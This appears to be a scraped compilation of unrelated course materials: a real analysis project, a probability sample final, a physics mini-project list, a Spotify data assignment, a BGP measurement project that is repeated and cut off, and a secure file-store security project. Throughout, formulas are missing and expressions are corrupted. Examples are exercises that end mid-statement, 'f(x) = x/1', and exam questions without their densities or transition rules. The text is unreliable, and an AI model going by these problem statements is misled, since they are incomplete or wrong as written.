Project Real Analysis due: Friday, 25 July 2025 Overview: The Project counts for 10% of your course grade, and is meant to enrich your understanding of the material covered in the lectures. There are multiple options for the project; each options allows you to create mathematical content using a different medium. The project will be graded according to displayed effort and mathematical accuracy. Instructions: Choose one of the project options by 11:59pm ET on Sunday, 6 July by completing the “Project Choice Assignment” in the Module 5 folder on Canvas. Complete the project and upload your work by 11:59pm ET on Friday, 25 July by completing the “Project Submission Assignment” in the Module 8 folder on Canvas. Option 1: The Paper. Choose one of the topics below; independently research the topic and write a 3 page “math paper” that includes the following: 1. A brief history of the topic. 2. A mathematically precise definition or construction. 3. Several mathematical facts concerning the topic, formated in terms of propositions and/or theorems. 4. Related mathematical ideas you discover during your research. Your paper should include at least one proof; more are preferred. You should properly cite any reference sources. I recommend writing your paper using LaTeX, but any document editing software that allows for mathematical expressions is acceptable. I recommend this option to any student who wants to expand the breadth of their mathematical understanding and study a topic related to, but not directly covered in, the course. Topics: 1. The construction of the Real Numbers. 2. Cardinality; the different “sizes of infinity”. 3. The Axiom of Choice. 4. The Cantor set. 5. Pathological functions (nowhere-differentiable function, space-filling curves, etc.). 6. The Rearrangement Theorem for conditionally convergent infinite series. 7. Cesaro and Abel summability. 8. Connectedness and Path-connectness. 9. Measure Theory. 10. Sequences and Series of Functions (there is a lot to research here; choose some subset of the facts you find). 11. Fourier Series. 12. Another topic you find interesting and get approved by me. Option 2: The Lecture. Choose a lecture from the course, or choose parts of several lectures that together form. a coherent train of mathematical thought. Create a virtual lecture, similar to the ones I produced for the course, that discusses the material you choose. Your lecture should be at least 45 minutes in length, in which you introduce at least one definition, provide at least one example, and prove at least one important proposition or theorem. Your video/audio quality need not be excellent, but you should practice your lecture and/or edit your recording so the final product could be used by a classmate in order to learn the material you discuss. You can prepare your visual content using Powerpoint, a virtual whiteboard (as I do), or something similar. I recommend this option to any student that wants to improve upon their mathematical communication and “develop their mathematical voice”. Option 3: The Problems. Solve the following three exercises; each guides you through the proof of an important theorem or idea from Real Analysis. Type your solutions using LaTeX; I suggest using Overleaf to do so. Your solutions should leave no mathematical stone unturned - this is your opportunity to demonstrate your proving skills! Next, choose one of the problems and record a 10-15 minute virtual presentation (using Zoom, Youtube, etc.) in which you discuss your proof. You should mention definitions and theorems from the course that are relevant to the problem and your solutions, and justify the steps of your proof so that a classmate who didn’t choose this project option could easily follow along and understand the details of the proof. You can prepare your visual content using Powerpoint, a virtual whiteboard (as I do), or something similar. I recommend this option to any student who wants to expand the depth of their mathematical under-standing and study important consequences of the material covered in the course. 1. In this problem, we prove a special case of the Contraction Mapping Theorem; this is arguably the most important result we’ve yet encountered in mathematics. First we prepare for the proof with some preliminary results. (a) Suppose f is continuous and that the sequence x, f(x), f(f(x)), f(f(f(x))), ... converges to l. Prove that l is a fixed point of f, i.e., that f(l) = l. (b) Show that if c ≠ 1 then (c) Suppose that |c| < 1. Prove that (d) Suppose that {xn} is a sequence satisfying |xn − xn+1| ≤ c n for some 0 < c < 1. Prove that {xn} is a Cauchy sequence. Now we prove the theorem. Argue carefully! Theorem. Suppose f : R → R is a contraction, i.e., f satisfies |f(x) − f(y)| ≤ c|x − y| for all x, y ∈ R for some c < 1. Then f has a unique fixed point, i.e., there exists exactly one x0 ∈ R such that f(x0) = x0. (e) Suppose f is a contraction with associated contraction constant c < 1. Prove that f is continu-ous. (f) Prove uniqueness of a fixed point, i.e., prove that f has at most one fixed point. (g) Prove existence of a fixed point, i.e., prove that f does have a fixed point. You should consider the sequence x, f(x), f(f(x)), ... for an arbitrarily chosen x ∈ R. 2. In this problem we’ll prove that every continuous function is integrable. In order to prove integrability we’ll need a stronger version of continuity. A function f is said to be uniformly continuous on A if for every ϵ > 0 there exists a δ > 0 such that for all x, y ∈ A if |x − y| < δ then |f(x) − f(y)| < ϵ. The difference between uniform. continuity and regular continuity is that in uniform. continuity the δ does not depend on x, i.e., the same δ should work in the definition of continuity for all x ∈ A. (a) Prove that if f is uniformly continuous then f is continuous. (b) Prove that f(x) = x is uniformly continuous on R. (c) Prove that f(x) = x2 is uniformly continuous on [0, 1] but not uniformly continuous on the real line R. (d) Prove that f(x) = x/1 is not uniformly continuous on (0, 1]. (e) Prove that if f : A → R is continuous and A is compact, then f is uniformly continuous on A. (f) Let f be continuous (and hence uniformly continuous) on [a, b]. Prove that for all ϵ > 0 there exists a partition P of [a, b] such that U(f, P) − L(f, P) < ϵ. Conclude that f is integrable on [a, b]. 3. Working with integrable functions is challenging because they need not be continuous. In this exercise we investigate step functions, which are easy to work with and closely approximate integrable functions. They are frequently used in mathematical analysis! A function s : [a, b] → R is step function if there is a partition P = {t0, ..., tn} of [a, b] such that s is constant on each (ti−1, ti). The values of s at each ti may be arbitrary. (a) Show that if s1 and s2 are step functions on [a, b], then s1 + s2 is as well. (b) Prove directly from the definition of step functions and of the integral (i.e., using Proposition 7.20 (2)) that (c) Prove that if f is integrable on [a, b], then for any ϵ > 0 there is a step function s1 ≤ f with and also a step function s2 ≥ f with (d) Suppose that for all ϵ > 0 there are step functions s1 ≤ f and s2 ≥ f such that Prove that f is integrable. (e) Use the above to provide an alternate proof of Proposition 7.20 (2). Your proof should not involve upper/lower sums. (f) One application of step functions is that we can approximate integrable functions with contin-uous functions. Prove that if f is integrable on [a, b] then for any ϵ > 0 there are continuous functions g ≤ f ≤ h with You should use part (c) to get started; if you find the construction of your continuous functions to be challenging, try drawing some pictures to help motivate yourself. Option 4: The Wild Card. Come up with your own project. If you choose this option, you should get your project idea approved by me by the end of Module 5 so you have time to complete it.
SAMPLE FINAL EXAM PSTAT 160A– Summer 2025 1. (10 points) A random variable X has continuous distribution with density (a) Find the moment generating function of X. Make sure to indicate for which t P R the MGF is well-defined. (b) Let X1, . . . , X5 be five independent and identically distributed (i.i.d.) random variables drawn from the distribution above. If what is ErY 2 s? (Hint: use properties of MGF) 2. (10 points) You generate 10 real numbers X1, . . . , X10 uniformly and independently sampled on (0, 1). Let S : = X1 + ... + X10. Without using a computer, estimate the probability that {S → 9}. (There are multiple ways to do it —some are better than others, you will get partial credit for not so good ones). 3. (10 points) Consider a random walk (Sn) that at each step goes up by +2 with probability 0.4, or down -1 with probability 0.6, i.i.d. Note that this walk is NOT simple. There are no boundaries, i.e. the state space are all integers. Answer TRUE or FALSE: For any i ∈ Z, state i of this stochastic process (Sn) is transient. Provide a paragraph-length explanation of your answer. Be sure to use concepts/terminology we learned in the course. 4. (15 points) Consider continually flipping a three-sided coin, with sides labelled: 1, 2, 3. Let X0 be the outcome of the first roll. Then we recursively define the process as follows: For each subsequent step n = 0, 1, 2, ..., we define Xn+1 by the rule So the state space is S = {0, 1, 2, 3}. Assume that each coin toss is independent of other tosses and that the coin is fair (i.e., that each side of the coin comes up with 1/3 probability). (a) (4 points) Clearly justify that this is a stationary Markov chain and find the transition matrix P. (b) (5 points) For each i P S, find Pi(X2 = 0). (c) (6 points) Find limn→∞ E[Xn]. Explain your solution approach. 5. (15 points) Your professor likes to go on scavenger hunts with his family. There are four zones at his parents’ house: front yard (F), back yard (B), side yard (S), and the deck (D). He moves around every 10 minutes according to the following rules: • If he is in the side yard, he is equally likely to go to the front, back, or deck. • If he is in the front yard, he goes to the side yard with probability 1/4, and stays in the front yard with probability 3/4. • If he is in the back yard, he has a 1/2 probability of staying there. Otherwise, he chooses between the deck and the side yard with equal probability. • If he goes on the deck, the scavenger hunt is over because he eats snacks and has a beverage (keeps staying on the deck). Suppose your professor starts the scavenger hunt in the Front Yard. (a) (4 points) Find the transition matrix with state space S = {F, B, S, D}. (b) (11 points) Compute the expected number of minutes until he reaches the deck for the first time. Explain your solution approach.
MSc Physics – Research Computing Skills – Mini Project The RCS course concludes with a short mini-project (some 10h effort) using Mathematica or Matlab; below are listed some suggested titles for mini-projects. You should begin work on your project on or soon after 10th March. The projects should be conducted individually and will be assessed by submitting your code with a short 1-2 page description of the problem and how to operate your code. The code and description should be submitted on Blackboard as a zip file. The deadline for submission is Wednesday 2nd April at 1pm. A few ground rules for the exercise: · You can select one of the suggested titles from the list below - OR think up your own project. Simulation projects must be built around a well-defined physical effect or situation and you may want to spend a day or two (but no more) reading background material before making your choice of project. · If you want to work on a project of your own devising please forward a title and a short paragraph describing what you hope to achieve to the demonstrator you think most appropriate, to see if we think it suitable (i.e. either of Dr Archer [email protected], or Dr Pasternak [email protected]). · We expect you to conduct these projects on your own - there will not be any formal demonstrator sessions to support you. You may NOT request additional time or help from individual demonstrators. The reasons for these rules on supervision are several fold - we want to see what you can achieve on your own; demand for supervisor time can grow without limit if not managed carefully; and we want to ensure a fair system - everyone gets the same level of support. One part of the project’s assessment will be your ambition and your understanding of the project, so you must consider what you can achieve in the short period of time available for the project. · The workload of the RCS course is supposed to be about 5 hours per week and so the mini project should take you no more than 10 hours. · Your project will be assessed against the criteria in the attached marking sheet. · Please make sure your code runs on the online versions of either Mathematica or Matlab, otherwise your mark could be significantly affected! Suggested Titles: 1. Atoms in an optical dipole trap 2. Simulating optical tweezers 3. Simulating an optical levitation trap 4. Cooling a quantum information processor: excitation modes of a linear ion string 5. Chaos and fractals 6. Self-organised criticality 7. Gross-Pitaevski equation 8. Ferromagnetism in the Ising model using the Metropolis algorithm 9. Classical Monte Carlo simulation of an atom in an intense laser field 10. Time-frequency analysis using wavelet transforms 11. Solitons in Bose-Einstein condensates 12. Solving the time dependent Schrodinger equation 13. Phase transitions in Conway’s “Game of Life” 14. Quantum mechanics of an anharmonic oscillator 15. Rydberg states and Rydberg energies 16. Dynamics of charge particles in magnetic field of a solenoidal lens 17. Behaviour of a driven harmonic oscillator with damping 18. Simulation of a sailing boat
Assignment: Spotify Songs AnalysisDownload the "spotify_songs.csv" file and import the dataset into RStudio. The dataset contains information about songs on Spotify. Use R programming to answer the following questions. Note: Since we do not cover all the methodologies required for the analysis (particularly for question 5) in the classroom, you are encouraged to use large language models to help you work on your assignment.1. Dataset exploration:a. How many songs are there in total in the dataset?b. How many distinct playlists are there in the dataset?c. How many distinct artists are there in the dataset?2. Track popularity visualization:a. Plot a histogram of the overall track popularity.b. Plot a histogram of the average track popularity by playlist genre.3. Identify and discuss the features that make a song more "danceable." Use both regression and correlation analyses.4. Perform a multiple linear regression to predict track popularity using numeric features and the genre of the playlist and answer the following questionsa. As an agent of a label company looking for young talents and their songs, identify the top three important features in a song that make it more likely to be popular.b. Assess the goodness of fit of your model. If the model fits the data well, explain why you think it's possible to "quantify art." If not, discuss what component(s) might be missing.c. Evaluate whether your regression suffers from multicollinearity.5. A record label company is interested in studying the evolution of “trendy”within the music industry. For instance, which brands or genres are popular each year? Are song titles getting shorter or longer over time? Does featuring a collaboration (e.g., 'feat. XXXX') make a song more popular?Your report should be an executive summary with a maximum length of five pages. Please explain the key numbers in your analysis in plain language and provide proper visualizations to support your findings.
In this assignment, we will explore Internet Measurements, a field of Computer Networks which focuses on large scale data collection systems and techniques that provide us with valuable insights and help us understand (and troubleshoot) how the Internet works. There are multiple systems and techniques that focus on DNS measurements, BGP measurements, topology measurements, etc. There are multiple conferences in this area, which we invite you to explore and keep up with the papers that are published. The IMC conference is one of the flagship conferences in this area: ACM Internet Measurement Conference A gentle introduction into the Internet Measurement field is to work with large scale BGP measurements and data to study topics such as:In this project we will use the BGPStream tool and its Python interface PyBGPStream to understand the BGP protocol and interact with BGP data. The goal is to gain a better understanding of BGP and to experience how researchers, practitioners, and engineers have been using BGPStream to gain insight into the dynamics of the Internet. If you are interested in going deeper, you can use these same tools to observe and analyze real-time BGP data or download and analyze other historical BGP data. The zip file accompanying this assignment contains the code and data needed to implement the functions in the file bgpm.py. You will submit only bgpm.py to Gradescope and all your code for the project must be contained within bgpm.py. This project description, in combination with the comments in bgpm.py, comprise the complete requirements for the project. There are two complete sets of data included in the zip file and the provided test harness in check_solution.py will test each of your functions against both sets of data. You are welcome to copy and modify check_solution.py to better suit your development and debugging workflow, but you will have the best chance of success with the hidden data set used for grading if your final submission passes all the tests in the unmodified check_solution.py. This project is designed to work in the class VM where the BGPStream libraries are installed. Your code will need to run without modification in the course VM. Some of the functions will have runtimes of several minutes. There is a lot of data to process, so the best way to speed up those functions is by focusing on the efficiency of your implementation. It is possible, but not supported, to install BGPStream and PyBGPStream on your local machine. Please don’t ask TA staff for help if you decide to do this. Gradescope imposes a hard time limit of 40 minutes for a grading session. We have no control over this and will not be able to make any allowances if your submission does not complete within that time limit. For this project, we will be using BGPStream, an open-source software framework for live and historical BGP data analysis, supporting scientific research, operational monitoring, and postevent analysis. BGPStream and PyBGPStream are maintained by the Center for Applied Internet Data Analysis (CAIDA). A high-level overview about how the BGPStream tool was developed was published by CAIDA in BGPStream: A Software Framework for Live and Historical BGP Data Analysis. This paper provides useful background and practical examples using BGPStream, so be sure to read it. Additionally, you should read African peering connectivity revealed via BGP route collectors, which provides a practical illustration of how the BGP collection system works.All the tasks are to be implemented using the Python interface to BGPStream. You are strongly encouraged to browse the following resources to familiarize yourself with the tool, and to run the example code snippets:As will become apparent when you peruse the above documentation and tutorial information, the majority of BGPStream use cases involve gathering data – either live or historical – directly from the Route Collectors (which we refer to simply as “collectors”). The code for accessing a collector or set of collectors directly usually looks like this: stream = pybgpstream.BGPStream( record_type=”updates”, from_time=”2017-07-07 00:00:00″, until_time=”2017-07-07 00:10:00 UTC”, collectors=[“route-views.sg”, “route-views.eqix”], filter=”peer 11666 and prefix more 210.180.0.0/16″) Each of the parameters to pybgpstream.BGPStream() winnows the data retrieved from the collector(s). Because we are using pre-cached historical data in this project, you will not need to specify a collector or a time range. You also don’t need to use any additional filtering.For this project, you can use set up and configure your streams with: stream = pybgpstream.BGPStream(data_interface=”singlefile”) stream.set_data_interface_option(“singlefile”, type, fpath) where type is one of [“rib-file”, “upd-file”][1] and fpath is a string representing the path to a specific cache file. When processing multiple files, you will create one stream per file. It is critical that you understand the BGP record format, especially the meaning and content of the fields (data attributes). A detailed explanation of BGP records and attributes can be found in RFC 4271: A Border Gateway Protocol 4 (BGP–4).It’s also worth spending some time exploring the provided data using the BGPReader command line tool (“a command line tool that prints to standard output information about the BGP records and the BGP elems that are part of a BGP stream”). Doing so will be particularly helpful in understanding how the fields described in RFC 4271 and elsewhere map to the BGP record and BGP elem concepts used by BGPStream and PyBGPStream.Because PyBGPStream allows you to extract the BGP attributes from BGP records using code, you will not have to interact with the BGP records in this format, but it is, nevertheless, helpful to see some examples using BGPReader to understand the fields. The next section showsHere, we will show sample command line output from BGPReader for illustration purposes:# read records from an update file, filtering for IPv4 only bgpreader -e –data-interface singlefile –data-interface-option upd-file=./rrc04/update_files/ris.rrc04.updates.1609476900.300.cache –filter ‘ipv 4’ # read records from a rib file, filtering for IPv4 only bgpreader -e –data-interface singlefile –data-interface-option rib-file=./rrc04/rib_files/ris.rrc04.ribs.1262332740.120.cache –filter ‘ipv 4’ The box below contains an example of an update record. In the record, the “|” character separates different fields. In yellow we have highlighted the type (A stands for Advertisement), the advertised prefix (210.180.224.0/19), the path (11666 3356 3786), and the origin AS (3786). The following is a Routing Information Base (RIB) record example. Consecutive “|” characters indicate fields without data.R|R|1445306400.000000|routeviews|route-views.sfmix|||32354|206.197.187.5|1.0.0.0/24|206.197.187.5|3235 4 15169|15169||| Do not rely on the directory layout of the provided data. Gradescope does not mirror the directory layout from the provided files. Specifically, in your final submission, do not directly access the filesystem in any way and do not import all or part of either os or pathlib. All filesystem interaction will occur via PyBGPStream and the file paths will be taken from the Python list in the parameter named cache_files that is passed to each function. Locate the directory rrc04/rib_files included with this assignment. This directory contains RIB dump files. Each filename (e.g., ris.rrc04.ribs.1262332740.120.cache) includes the collector’s name (ris.rrc04), the type of data (ribs), and the Unix timestamp of the data (1262332740, which you can convert to a date via either of the two above links). Each of the cache files is a snapshot of BGPM data collected by the collector at the time of the timestamp. In the rest of this assignment the term “snapshot” refers to the data in a particular cache file. Do not pull your own data. Your solution will be graded using cached data only. You will need to write code to process the cache files. Each entry in cache_files is a string containing the full path to a cache file. To access a given path, your code will need to set up the appropriate data interface in your BGPStream() constructor:stream = pybgpstream.BGPStream(data_interface=”singlefile”) stream.set_data_interface_option(“singlefile”, type, fpath) where type is one of [“rib-file”, “upd-file”] and fpath is a string representing the path to a specific cache file. When processing multiple files, you will create one stream per file.Tip: Your code shouldn’t make assumptions about the number of cache files. In this task you will measure the growth over time of Autonomous Systems and advertised prefixes. The growth of unique prefixes contributes to ever-growing routing tables handled by routers in the Internet core. As optional background reading, please read the seminal paper On Characterizing BGP Routing Table Growth. This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from cache files, measure the number of unique advertised prefixes over time. Each file is an annual snapshot. Calculate the number of unique prefixes within each snapshot by completing the function unique_prefixes_by_snapshot(). Make sure that your function returns the data structure exactly as specified in bgpm.py. This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from the cache files, measure the number of unique Autonomous Systems over time. Each file is an annual snapshot. Calculate the number of unique ASes within each snapshot by completing the function unique_ases_by_snapshot(). Make sure that your function returns the data structure exactly as specified in bgpm.py. Note: Consider all paths in each snapshot. Here, we consider all AS that appear in the paths (not only the origin AS). You may encounter corner cases of paths with the following form: “25152 2914 18687 {7829,14265}”. In this case, consider the AS in the brackets as a single AS. So, in this example, you will count 4 distinct ASes. This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from the cache files, calculate the percentage growth in advertised prefixes for each AS over the entire timespan represented by the snapshots by completing the function top_10_ases_by_prefix_growth(). Make sure that your function returns the data structure exactly as specified in bgpm.py. Consider each origin AS separately and measure the growth of the total unique prefixes advertised by that AS from its first appearance to its last appearance. To compute this, for each origin AS:appear in the first and last snapshots.[0, 124, 215, 512, 0] The percentage increase would then be:= 3.13 or 313%Note: There are no ties, so don’t worry about implementing tie-breaking. Edge case: When calculating the prefixes originating from an origin AS, you may encounter paths of the following form: “25152 2914 18687 {7829,14265}”. This is an edge case, and it should affect only a small number of prefixes. In this case, you consider the entire set of AS “{7829,14265}” as the origin AS.In this task you will measure if an AS is reachable over longer or shorter path lengths as time progresses. Towards this goal you will measure the AS path lengths, and how they evolve over time.This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from the cache files, calculate the shortest path for each origin AS in each snapshot by completing the function shortest_path_by_origin_by_snapshot(). Make sure that your function returns the data structure exactly as specified in bgpm.py.For each snapshot, you will compute the shortest AS path length for each origin AS in the snapshot by following the steps below:AS and ”2914” appears twice in the path. This is a path of length 4.25152 25152”), the path has length 1 and should be ignoredExample: The length of the AS path “25152 2914 18687 {2914,14265} 2945 18699” is 6.Example: The length of the AS path “25152 2914 18687 18687 {18687}” is 4. The entries “18687” and “{18687}” are distinct, so you only deduplicate “18687”. In this task, we will measure how long prefix Announcements last before they are withdrawn. This matters because, when a prefix gets Advertised and then Withdrawn, this information propagates and affects the volume of the associated BGP traffic. Optional background reading on this topic can be found in The Shape of a BGP Update. This task will use cache files from the update_files subdirectories. These are update files, so you will pass “upd-file” in your call to set_data_interface_option(). Using the data from the cache files, we will measure how long prefix Announcements last before they are withdrawn by completing the function aw_event_durations(). Make sure that your function returns the data structure exactly as specified in bgpm.py. In defining Announcement Withdrawal (AW) events, we will only consider explicit withdrawals. An explicit withdrawal occurs when a prefix is advertised with an (A)nnouncement and is then (W)ithdrawn. In contrast, an implicit withdrawal occurs when a prefix is advertised (A) and then re-advertised (A) – usually with different BGP attributes. To compute the duration of an Explicit AW event for a given peerIP/prefix, you will need to monitor the stream of (A)nnouncements and (W)ithdrawals separately per peerIP/prefix pair. In this task you will identify and measure the duration of Real-Time Blackholing (RTBH) events. You will need to become familiar with Blackholing events. Good resources for this include RFC7999, Section 2, BGP communities: A weapon for the Internet (Part 2), and the video Nokia – SROS: RTBH – Blackhole Community. This task will use cache files from the update_files_blackholing subdirectories. These are update files, so you will pass “upd-file” in your call to set_data_interface_option().Using the data from the cache files, we will identify events where prefixes are tagged with a Remote Triggered Blackholing (RTBH) community and measure the time duration of the RTBH events by completing the function rtbh_event_durations(). Make sure that your function returns the data structure exactly as specified in bgpm.py. The duration of an RTBH event for a given peerIP/prefix pair is the time elapsed between the last (A)nnouncement of the peerIP/prefix that is tagged with an RTBH community value and the first (W)ithdrawal of the peerIP/prefix. In other words, we are looking at the stream of Announcements and Withdrawals for a given peerIP/prefix and identifying only explicit withdrawals for an RTBH tagged peerIP/prefix. To identify and compute the duration of an RTBH event for a given peerIP/prefix, you will need to monitor the stream of (A)nnouncements and (W)ithdrawals separately per peerIP/prefix pair. Submit bgpm.py to Gradescope. Please refer to the Georgia Tech Honor Code located here:https://policylibrary.gatech.edu/student–affairs/academic–honor–code We strictly enforce Section 3. Student Responsibilities including these prohibited actions: In addition, the usage of AI tools such as ChatGPT in assisting and/or completing part or all of your project is explicitly prohibited. Even if they are used for just one task, that constitutes an academic integrity violation and you will receive a 0 for the entire project. The same holds true if you are found to have accessed and utilized external resources such as non-CAIDA GitHub repositories containing partial or complete solutions, other student solutions (past or present), or solutions uploaded to sites like CourseHero. Even if said resources are used for just one task, that constitutes an academic integrity violation and you will receive a 0 for the entire project. Official resources and those referenced in the project document such as the official Python documentation, official CAIDA documentation, code examples, repositories, etc. do not need to be cited. If you reference unofficial coding/programming resources such as W3Schools, Stack Overflow, etc. please cite them in your code. If you are struggling with certain tasks, ask for help from your peers and/or the teaching staff on Ed Stem, come to office hours, and if all else fails, move on to other tasks so you can at least get partial points on the project. That is far better than receiving a 0 for the entire project due to an academic integrity violation.[1] You can see a complete list of types by running: bgpreader –data-interface singlefile -o?
This project is based on the topic of distributed systems security that is covered in Modules 11 and 12. The goal of the project is to gain hands-on experience in implementing secure distributed services. You will develop a simple Secure Shared Store (3S) service that allows for the storage and retrieval of documents created by multiple users who access the documents at their local machines. In the implementation, the system should consist of one or more 3S client nodes and a single server that stores the documents.Users should be able to login to the 3S server through any client by providing their private key as discussed in Module 12. Session tokens would be generated upon successful authentication of the users. They can then check-in, checkout and delete documents as allowed by access control policies defined by the owner of the document.To implement such a distributed system, we will need to make use of certificates to secure the communication between clients and the server, and to authenticate sources of requests. You will need to make use of a Certificate Authority (CA) that generates certificates for users, client nodes and the server. All nodes trust the CA. We have provided a Virtual Machine for the project. Links to download the image (.ova file) will be posted on Ed Discussion.The default account on the VM is cs6238 and the password is cs6238. The root password is also cs6238. In an ideal setting, the 3S server and the client would be on separate nodes. For simplicity, we have set up only one VM. The server and client nodes are abstracted as separate folders within the VM. For example, the server folder represents the server and the client1 folder represents the client node.The desktop contains a Project4 folder which has the skeletal implementation of the 3S service. You will be required to complete the implementation to satisfy all the functionalities which will be detailed below. The Project4 folder contains:Fig: Folder structure of Project4 As discussed above, we will need to make use of a Certificate Authority that is trusted by all nodes. This CA would be used to generate certificates for the users, client nodes and the server. One can make use of a library such as OpenSSL for setting up the CA and to generate certificates.For this project, we have created a CA. This CA has been used to generate certificates for the server. You would be required to generate certificates for the client nodes using this CA. The CA (certificate and key) was generated using the password (passphrase) cs6238.Detailed instructions on generating certificates are present in Appendix A.When the client keys and certificates are created, they should be placed in the clientX/certs folder and should be named as clientX.key and clientX.crt After a 3S server starts, a client node can make requests to the server. Let’s assume that client nodes have a discovery service that allows them to find the hostname where 3S runs. The hostname, in this case, is secureshared-store. The certificate for the server contains secure-shared-store as the common name of the server. Whenever the client node makes a request, mutual authentication is performed, and a secure communication channel is established between the client node and the server. Here we make use of nginx to perform mutual authentication (MTLS). Every request from the client node should include the certificate of the client node for authentication.As mentioned before, the 3S service should enable functions such as login, checkin, checkout, grant, delete, and logout. You will have to complete the skeleton code provided for the server and client to achieve these functionalities. Details are as follows: When the Security Flag is set as Confidentiality (to be represented by “1”), the server generates a random AES key for the document, uses it for encryption and stores data in the encrypted form. To decrypt the data at a later time, this key is also encrypted using the server’s public key and stored with document meta-data. When theSecurity Flag is set as Integrity (to be represented by “2”), the server stores the document along with a signed copy. When a request is made for a document stored with Confidentiality as the SecurityFlag, the server locates the encrypted document and its key, decrypts the data and sends it back over the secure channel. Similarly, when a request is made for a document stored with Integrity as the SecurityFlag, the signature of the document must be verified before sending a copy to the client.Additionally, when a request is made to checkin a document that is checked out in the current active session, the client must move (not copy) the document from the “/documents/checkout” folder into the“/documents/checkin” folder. The client implementation must handle the transfer of these files between the folders automatically. ta Grant can only be issued by the owner of the document. b This will change the defined access control policy to allow the target user (TUID) to have authorization for the specified action (R) for the specified document (DID).c AccessRight R can either be:i checkin (which must be represented by input 1) ii checkout (which must be represented by input 2) iii both (which must be represented by input 3)for time duration T (in seconds). If the TargetUser is ALL (TUID=0), the authorization is granted to all the users in the system for this specific document. If there are multiple grants that have been authorized for a particular document and user, the latest grant would be the effective rule. Basically, the latest grant for the tuple (DID, TUID) should persist.Here are a few clarification scenarios for Grant:− If an initial grant for (file1, user1, 2, 100) is successful and then a successful grant request (file1, 0, 1, 50) is made, then file1 should be accessible for checkin only to all users for 50 seconds. User1 loses the checkout access given earlier.− Grant (file1, 0, 3, 100) exists and then a successful grant request (file1, user2, 2, 50), then file1 is accessible to user2 for checkout for 50 seconds and invalidates the previous grant. Since this is a security class, you should use secure coding practices. You are also expected to use static code analysis tools such as Pylint, Pyflakes, etc. and minimize the use of unsafe function calls (justify any such calls you need to make by providing inline comments). The report should list tools used to ensure that your code does not have any vulnerabilities. The report should also discuss the threat model and what threats are handled by your implementation. Fig. Project Flow − How mutual authentication is achieved in the current implementation of 3S.− Details on the cryptographic libraries and functions used to handle secure file storage.− How the user information and metadata related to documents were stored.− Details of how the required functionalities were implemented− List any features that were not implemented or tested (partial points may be awarded).− List the assumptions made, if any. Please ensure that you do not zip the files in your submission. Also, please stick to the specified naming conventions since an auto grader would be evaluating your submissions. IMPORTANT: Please ensure that you submit only these 4 files along with the video (See Video Requirements below) that are mentioned and follow the specified naming conventions. Any error in adhering to these guidelines would result in an error with the autograder and would result in a significant loss of points. IMPORTANT: Do not hardcode the public or private key names (eg: user1.key or user1.pub) in your code. Make sure the usernames and keys are all in lowercase only. Halfway through the project, if there are many common doubts, we will consolidate the clarification posts and share it as a note. Report – 30 points Implementation of 3S – 70 points Each function in the implementation will be scored as below: As mentioned earlier, this project will be graded by an auto grader so please follow the guidelines mentioned in this file. However, there is an alternative solution if the auto grader fails for your submission due to any reason. This video (a screen recording) will be required to be submitted as part of your submission and will be then graded for partial credit (only if the auto grader fails). This must be added as a media comment on your submission and can be of any common video format. If you fail to submit the video, you’ll get a penalty of 10 points. The following steps will be required to be shown as a part of your video:The video should show the file locations and content. Try to show as many details about the functionality of the program as possible. Certificate Generation:The resource below describes how to set up a Certificate Authority (CA) and then how it’s certificate would be used to generate certificates for the nodes.We have already set up a CA. You can find the CA certificates in the CA folder of Project4. We have also generated the server keys and certificate (certname is secure-shared-store) using the CA certificate. Also, the following command was used to extract the public key from the certificate. openssl x509 -pubkey -noout -in secure-shared-store.crt > secure-shared-store.pub You can use the above resources to generate certificates and keys for the client nodes and users.
Table of ContentsMotivation……………………………………………………………………………………………………………………….. 2 Introduction…………………………………………………………………………………………………………………….. 2 Project Overview and Background………………………………………………………………………………………… 3 Required Background………………………………………………………………………………………………………. 3 Read the resources…………………………………………………………………………………………………………. 4 Run Example Code Snippets……………………………………………………………………………………………… 4 Important Note……………………………………………………………………………………………………………… 4 Familiarize Yourself with the BGP Record Format and BGP Attributes…………………………………………. 5 Update Example…………………………………………………………………………………………………………….. 6 RIB Example………………………………………………………………………………………………………………….. 6 Setup………………………………………………………………………………………………………………………………. 7 Cache Files / Snapshots……………………………………………………………………………………………………. 7 Task 1. Understanding BGP Routing table Growth……………………………………………………………………. 8 Task 1A: Unique Advertised Prefixes Over Time…………………………………………………………………….. 8 Task 1B: Unique Autonomous Systems Over Time………………………………………………………………….. 8 Task 1C: Top-10 Origin AS by Prefix Growth………………………………………………………………………….. 9 Task 2: Routing Table Growth: AS-Path Length Evolution Over Time…………………………………………… 10 Task 3: Announcement-Withdrawal Event Durations………………………………………………………………. 12 Task 4: RTBH Event Durations…………………………………………………………………………………………….. 13 Submission…………………………………………………………………………………………………………………….. 15 Grading Rubric………………………………………………………………………………………………………………… 15 Honor Code / Academic Integrity / Plagiarism………………………………………………………………………. 15 In this assignment, we will explore Internet Measurements, a field of Computer Networks which focuses on large scale data collection systems and techniques that provide us with valuable insights and help us understand (and troubleshoot) how the Internet works. There are multiple systems and techniques that focus on DNS measurements, BGP measurements, topology measurements, etc. There are multiple conferences in this area, which we invite you to explore and keep up with the papers that are published. The IMC conference is one of the flagship conferences in this area: ACM Internet Measurement Conference A gentle introduction into the Internet Measurement field is to work with large scale BGP measurements and data to study topics such as:In this project we will use the BGPStream tool and its Python interface PyBGPStream to understand the BGP protocol and interact with BGP data. The goal is to gain a better understanding of BGP and to experience how researchers, practitioners, and engineers have been using BGPStream to gain insight into the dynamics of the Internet. If you are interested in going deeper, you can use these same tools to observe and analyze real-time BGP data or download and analyze other historical BGP data. The zip file accompanying this assignment contains the code and data needed to implement the functions in the file bgpm.py. You will submit only bgpm.py to Gradescope and all your code for the project must be contained within bgpm.py. This project description, in combination with the comments in bgpm.py, comprise the complete requirements for the project. There are two complete sets of data included in the zip file and the provided test harness in check_solution.py will test each of your functions against both sets of data. You are welcome to copy and modify check_solution.py to better suit your development and debugging workflow, but you will have the best chance of success with the hidden data set used for grading if your final submission passes all the tests in the unmodified check_solution.py. This project is designed to work in the class VM where the BGPStream libraries are installed. Your code will need to run without modification in the course VM. Some of the functions will have runtimes of several minutes. There is a lot of data to process, so the best way to speed up those functions is by focusing on the efficiency of your implementation. It is possible, but not supported, to install BGPStream and PyBGPStream on your local machine. Please don’t ask TA staff for help if you decide to do 